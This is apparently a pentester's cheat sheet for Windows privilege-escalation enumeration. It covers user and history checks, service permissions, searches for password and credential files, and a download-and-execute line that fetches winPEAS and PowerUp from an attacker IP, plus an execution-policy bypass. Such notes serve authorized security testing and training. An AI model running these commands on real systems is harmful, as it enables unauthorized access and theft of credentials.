set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
Basic enum / quick wins
net user
net user <current user>
(Get-PSReadlineOption).HistorySavePath
type <history file path returned by the previous command>
ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
Do this for every user profile present on the box, and again during post-exploitation.
Network and port enum
netstat -ano
route print
Installed software and service enum
dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls <service binary path>
Sensitive file enum
gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinue
gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
where.exe /R C:\Windows bash.exe
where.exe /R C:\Windows wsl.exe
Process snooping
Import-Module .\Watch-Command.ps1
Get-Process | watch-command -diff -cont -verbose -property "Image Name"
curl 192.168.45.x/winPEAS.exe -o winpeas.exe
.\winpeas.exe
IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks
powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'
As a last resort, dig through the event log for events recorded by Script Block Logging. Maybe there will be a password lol.
Applications and Services